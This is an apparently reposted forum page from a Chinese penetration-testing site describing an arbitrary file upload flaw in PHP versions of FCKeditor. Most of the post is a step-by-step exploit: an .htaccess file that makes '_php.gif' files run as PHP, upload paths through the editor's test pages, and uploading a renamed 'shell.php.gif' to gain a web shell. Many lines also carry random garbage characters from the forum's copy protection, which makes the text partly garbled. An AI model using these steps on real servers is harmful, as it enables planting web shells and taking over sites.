中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞8 a4 [( b( x4 i* V* N$ x
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
- B/ s3 [1 Y: k  u减小字体 增大字体0 S8 y$ o- f/ s5 e
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability: Q2 K* W( P( f* L6 P1 u4 i
[+] Date: 2011& {: h, R$ h& ?# P6 p5 J
[+] Author : sinesafe.cn8 o+ `4 D: \. [. _* j, ^) W2 F
[+] Website : WwW.sinesafe.cn4 y7 V5 b, i5 b" o  y+ l7 q' r% j
———————————————————% G( A# U8 [% U+ @9 B5 D9 f
1.create a htaccess file:
' Z/ L! k1 e6 L: g! \. Ncode:' Y0 T, \( _( z6 P5 Z
<FilesMatch “_php.gif”>
3 j  j0 l) f2 U- Z* ]% C4 ZSetHandler application/x-httpd-php; r. L( \( O% Q3 k" r. U
</FilesMatch>. m% ^8 `4 ]. }; C4 q4 J
0 |( d  `& m& d: f; P+ M9 g
2.Now upload this htaccess with FCKeditor.3 b5 P5 ^4 ^$ p  O" y
9 N7 J1 F" O4 [7 V
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html* g% r8 X0 D; z# Q3 a9 p
. q9 i6 j7 o: ^1 q- D7 Q9 C
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html9 r. H* W. c1 W6 K4 c
+ j$ P5 b: h2 Z( [
———————————————————————————————-; e  h  H! K2 o2 h! a9 i/ d
3.Now upload shell.php.gif with FCKeditor.* Q* O5 S# K5 w) t( X3 N' c) k
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.7 S+ V; }( {  ?/ E3 A4 A$ \; V; {
5.http://www.sinesafe.cn/anything/shell_php.gif
$ D4 F9 I0 _5 W+ `! d6.Now shell is available from server.

! q' @/ l6 q" v+ h! R; j# z; B# L4 Q, Q2 o
; J& M: y8 }4 d4 `9 v




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2